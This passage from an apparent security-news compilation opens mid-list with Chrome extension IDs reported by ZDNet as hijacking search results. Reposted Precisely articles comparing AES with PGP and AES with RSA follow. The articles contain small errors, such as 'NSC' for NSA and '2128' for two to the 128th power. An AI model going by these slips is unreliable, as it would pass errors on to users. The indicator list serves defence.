  237. ofkjndegefemablfmefngnpchlhapdmi, “Art Wallpaper HD Custom New Tab”
  238. ofockibbbgfclddbpbhhohdldgkomhgm, “Custom Super Cars Wallpaper HD Custom New Tab”
  239. ogegpnamjdpcadpldhijjlhkicgbnkjj, “Louis Vuitton Wallpaper HD Custom New Tab”
  240. ogiaghccmoklogdlbchapejmjnnlichn, “Japan Wallpaper HD Custom New Tab”
  241. ohjoklkmollkbcibgddolpmpgaoophfl, “One Direction Wallpaper HD Custom New Tab”
  242. ohobkendnpiijpeiaimjbannfcmhaogi, “Deathstroke Wallpaper HD Custom New Tab”
  243. ohoingjkmkkoffkdmbpipdncbkhaaefd, “Dachshund Wallpaper HD Custom New Tab”
  244. oihecidjnjpjfeefkambkjgebbmpahgn, “Dc Comics Shazam Wallpaper HD Custom New Tab”
  245. oilikkahlcnchaipbojfgejapechblbl, “Santa Claus Christmas Wallpaper HD New Tab”
  246. ojfjgkolegfhneacbgcjaoajfgcfoapf, “Halloween Wallpaper HD Custom New Tab”
  247. ojhlagjgjbjfgllocdhlpnkbdlcipnmo, “Cars”
  248. ojmpgbcmiimbkmjfgmcneplkneleehcc, “God Of War 2018 Wallpaper HD Custom New Tab”
  249. ojnlggfhmoioajgmnelfdpjojaeknjog, “The Incredibles 2 Wallpaper HD Custom New Tab”
  250. okgnpdnekilbcgcfeheanbpbhnhmopfc, “Yeezy Wallpaper HD Custom New Tab”
  251. okjdiicjoeloipmgdopdmhpebnnfadih, “Sao Alicization Wallpaper HD Custom New Tab”
  252. okphhehkikoonipdjmhglcmlgccjcblp, “Los Angeles Lakers Wallpaper HD New Tab”
  253. olochidfgadpdbdmdfbhgimiffnllaij, “Dragon Ball Super Wallpaper HD Custom New Tab”
  254. ombenndgcnmcnfohnbbjcmbmfmpefojc, “Panda Wallpaper HD Custom New Tab”
  255. omclahaofiigfggelbcleagcphjhabmp, “Fallout 76 Wallpaper HD Custom New Tab”
  256. onjjlcdmafgcjdbhmlnpmheobbfeilah, “Lego Wallpaper HD Custom New Tab”
  257. onnmfhejbikffoenamcfglpjnmmbkdeg, “Daredevil Wallpaper HD Custom New Tab”
  258. oonheecobachpkogdjjnemiipogpgnmg, “The Vampire Diaries Wallpaper HD New Tab”
  259. opbobdfddmiemhekjiglckcenhpfdbjm, “Hulk Wallpaper HD Custom New Tab”
  260. opjpfngjbdmgkilopbnapbkbngedcpmj, “Bap Kpop Wallpaper HD Custom New Tab”
  261. oplhjpchbbngmpgcpjcbijhfehbhodgi, “Rwby Wallpaper HD Custom New Tab”
  262. oppbpkjmehgijcpeddkpbadoidfpcblg, “Live Christmas Snowfall Wallpaper HD New Tab”
  263. paddichbcfehpelokpidnagccddbpkin, “Tesla Wallpaper HD Custom New Tab”
  264. pajbempmgmalnfpbnpclkelnhfccikal, “Bts Bangtan Boys Wallpaper HD Custom New Tab”
  265. pboddlnfegdnifbhepjegnokocjpadpd, “Kawaii Wallpaper HD Custom New Tab”
  266. pcbpmbmpjjibcmodpaomahiokikjomgc, “Boston Terrier Wallpaper HD Custom New Tab”
  267. pcembleiffdccjkcebaodmhgkopipdan, “Ultra Instinct Goku Wallpaper HD New Tab”
  268. pcgcmplcfdfkkkmaggghdghnlddkpbbo, “DBS and Dragon Ball Super”
  269. pdhibfagbndnidgfjkhdhlfibdoofbji, “Bmw Wallpaper HD Custom New Tab”
  270. pdloaiifhmlbhhppajjmfpijopfeenoo, “Bentley Wallpaper HD Custom New Tab”
  271. pehnljkefahmlhifockljagcfcpljclc, “Gothic Wallpaper HD Custom New Tab”
  272. pelnnoacfeaanpmnmacjjnnpgfggekig, “V & Jimin Wallpaper HD Custom New Tab”
  273. pfekelemlpmelhipncgddloaflehglmb, “Tiger Wallpaper HD Custom New Tab”
  274. pfepcffcdodcancalckiencamnonoebl, “Momo Twice Wallpaper HD Custom New Tab”
  275. pfpgpbfndacjjjdlgefggndhionakfmb, “Lilo And Stitch Wallpaper HD Custom New Tab”
  276. pghkmhmjldklacabcgkaaboikfaaogmi, “Kpop Big Bang Wallpaper HD Custom New Tab”
  277. pgilbgknfcnjjblfnjojmcpkggipblci, “Clash Of Clans Wallpaper HD Custom New Tab”
  278. pgleokbigapafgjodffamlhdkhiagdgb, “Bmw Wallpaper HD Custom New Tab”
  279. phkafpikdokjpogdhjpkcgfjpfgnlgeo, “Hulk Wallpaper HD Custom New Tab”
  280. phmogllmicehmpglfobbihoelfidjnpd, “Carolina Panthers Wallpaper HD Custom New Tab”
  281. pihogmfmhefemijkgmbimkngninbkkce, “J-Hope Wallpaper HD Custom New Tab”
  282. pilmbpeapchjcnldfomimmcfoigoenoc, “Emoji Unicorn Wallpaper HD Custom New Tab”
  283. pinfndnjmdocmimbeonilpahdaldopjc, “Assassination Classroom Wallpaper HD New Tab”
  284. pinkcaefpkjpljfflabpkcgbkpbomdfk, “Forest Wallpaper HD Custom New Tab”
  285. pjabdohmcokffcednbgpeoifpdbfgfbj, “Cool Fortnite Wallpaper HD Custom New Tab”
  286. pjjmcpmjocebmjmhdclbiheoideefiad, “Harry Potter Wallpaper HD Custom New Tab”
  287. plcdglhlbmlnfoghfhmbhehapfadedod, “Code Geass Wallpaper HD Custom New Tab”
  288. pmdakkjbaeioodmomlmnklahihodjcjk, “Kpop Red Velvet Wallpaper HD Custom New Tab”
  289. pmnpldnflfopbhndkjndecojdpgecckf, “Mac Wallpaper HD Custom New Tab”
  290. pnamonkagicmlnalnlcdaoeenhlgdklf, “Fortnite Skull Trooper Wallpaper HD New Tab”
  291. poeokidblnamjkagggonidcigafaobki, “Kakashi Hatake Wallpaper HD Custom New Tab”
  292. pofffhlknjbjolmfoeagdmbbdbjjmeki, “Bts Wallpaper HD Custom New Tab”
  293. polgnkadhhhmlahkhhbicledbpklnake, “James Harden Wallpaper HD Custom New Tab”
  294. ppicajcmopaimnnikbafgknffbdmomfk, “Muscle Cars Wallpaper HD Custom New Tab”
  295. ppmbiomgjfenipmnjiiaemcaboaeljil, “Forntine Battle Ground Wallpaper HD New Tab”

Source :
https://www.zdnet.com/article/cluster-of-295-chrome-extensions-caught-hijacking-google-and-bing-search-results/

AES vs PGP Encryption: What is the Difference?

In the world of data security there are many different types of encryption, but arguably the two most common are AES and PGP. With so many three-letter acronyms in the technical landscape, it’s easy to get lost in data security conversations. So let’s catch up!

First, we’ll define both AES and PGP, and then we’ll look at how they compare to each other.

AES encryption

AES stands for Advanced Encryption Standard. It is the dreamchild of two cryptographers’ proposal of a symmetric key encryption algorithm based on the Rijndael cipher. This algorithm was developed when the National Institute of Standards and Technology (NIST) sent the call out to the cryptographic community to develop a new standard. NIST spent five years evaluating 15 competing designs for the AES project. In 2001, NIST announced the cipher developed by the two Belgians, Joan Daemen and Vincent Rijmen, as the adopted standard (known as FIPS-197) for electronic data encryption.

AES is a symmetric key encryption algorithm, which essentially means that the same key is used to encrypt and decrypt the data. A computer program takes clear text and processes it through an encryption key and returns ciphertext. If the data needs to be decrypted, the program processes it again with the same key and is able to reproduce the clear text. This method required less computational resources for the program to complete its cipher process, which means lower performance impact. AES is a good method to protect sensitive data stored in large databases.

That said, AES will not always be your go-to for encrypting data.

When sharing sensitive information with trading partners or transferring information across networks, using AES would leave your data vulnerable because you would need to share your encryption key with your trading partners. This means that while they would be able to decrypt the information you sent them, they could also decrypt anything else encrypted using that same key.

And if the key itself were compromised, then anyone in its possession could decrypt your data.

PGP encryption

The answer to your above data sharing security problem is found in PGP encryption. This is because PGP uses both symmetric and asymmetric keys to encrypt data being transferred across networks.

PGP stands for Pretty Good Privacy. Which is ironic because it’s actually much better than just “pretty good.”

PGP was developed by the American computer scientist Phil Zimmerman, who made it available for non-commercial use at no charge in 1991. To encrypt data, PGP generates a symmetric key to encrypt data which is protected by the asymmetric key.

Asymmetric encryption uses two different keys for the encryption and decryption processes of sensitive information. Both keys are derived from one another and created at the same time. This key pair is divided and referred to as a public key and a private key. Data is only encrypted with a public key, and thus, can only be decrypted with its matching private key.

AES vs PGP encryption

PGP is just as strong as that of AES, but it adds an additional layer of security to prevent anyone who only has the public key from being able to decrypt data.
Another benefit of asymmetric encryption is that it allows for authentication. After you have exchanged public keys with your trading partners, the private keys can be used to digitally sign the encrypted content, allowing the decryptor to verify the authenticity of the sender.

PGP requires more computational resources, which is why it is usually not recommended for encrypting data in large databases where information needs to be accessed frequently, and each record that you access needs to be ran through a cryptographic process.

AES or PGP: Which should I use?

When you are considering which encryption to use for your sensitive information, choose whichever will suit your needs best:

  • AES is fast and works best in closed systems and large databases
  • PGP should be used when sharing information across an open network, but it can be slower and works better for individual files.

Source :
https://www.precisely.com/blog/data-security/comparing-aes-pgp-encryption

AES vs. RSA Encryption: What Are the Differences?

One thing that’s become abundantly clear in the internet age is that preventing unauthorized people from gaining access to the data stored in web-enabled computer systems is extremely difficult. All it takes is for a worker to click on the wrong link in an email, or respond unwarily to a seemingly legitimate request for information, and an intruder could gain complete access to all your data. In today’s regulatory and public relations environments, that kind of breach can be catastrophic.

But what if you could be assured that even if an attacker got access to your information, they couldn’t use it? That’s the role of data encryption.

How encryption works

The basic idea of encryption is to convert data into a form in which the original meaning is masked, and only those who are properly authorized can decipher it. This is done by scrambling the information using mathematical functions based on a number called a key. An inverse process, using the same or a different key, is used to unscramble (or decrypt) the information. If the same key is used for both encryption and decryption, the process is said to be symmetric. If different keys are used the process is defined as asymmetric.

Two of the most widely used encryption algorithms today are AES and RSA. Both are highly effective and secure, but they are typically used in different ways. Let’s take a look at how they compare.

AES encryption

AES (Advanced Encryption Standard) has become the encryption algorithm of choice for governments, financial institutions, and security-conscious enterprises around the world. The U.S. National Security Agency (NSC) uses it to protect the country’s “top secret” information.

The AES algorithm successively applies a series of mathematical transformations to each 128-bit block of data. Because the computational requirements of this approach are low, AES can be used with consumer computing devices such as laptops and smartphones, as well as for quickly encrypting large amounts of data. For example, the IBM z14 mainframe series uses AES to enable pervasive encryption in which all the data in the entire system, whether at rest or in transit, is encrypted.

AES is a symmetric algorithm which uses the same 128, 192, or 256 bit key for both encryption and decryption (the security of an AES system increases exponentially with key length). With even a 128-bit key, the task of cracking AES by checking each of the 2128 possible key values (a “brute force” attack) is so computationally intensive that even the fastest supercomputer would require, on average, more than 100 trillion years to do it. In fact, AES has never been cracked, and based on current technological trends, is expected to remain secure for years to come.

RSA encryption

RSA is named for the MIT scientists (Rivest, Shamir, and Adleman) who first described it in 1977. It is an asymmetric algorithm that uses a publicly known key for encryption, but requires a different key, known only to the intended recipient, for decryption. In this system, appropriately called public key cryptography (PKC), the public key is the product of multiplying two huge prime numbers together. Only that product, 1024, 2048, or 4096 bits in length, is made public. But RSA decryption requires knowledge of the two prime factors of that product. Because there is no known method of calculating the prime factors of such large numbers, only the creator of the public key can also generate the private key required for decryption.

RSA is more computationally intensive than AES, and much slower. It’s normally used to encrypt only small amounts of data.

How AES and RSA work together

A major issue with AES is that, as a symmetric algorithm, it requires that both the encryptor and the decryptor use the same key. This gives rise to a crucial key management issue – how can that all-important secret key be distributed to perhaps hundreds of recipients around the world without running a huge risk of it being carelessly or deliberately compromised somewhere along the way? The answer is to combine the strengths of AES and RSA encryption.

In many modern communication environments, including the internet, the bulk of the data exchanged is encrypted by the speedy AES algorithm. To get the secret key required to decrypt that data, authorized recipients publish a public key while retaining an associated private key that only they know. The sender then uses that public key and RSA to encrypt and transmit to each recipient their own secret AES key, which can be used to decrypt the data.

Source :
https://www.precisely.com/blog/data-security/aes-vs-rsa-encryption-differences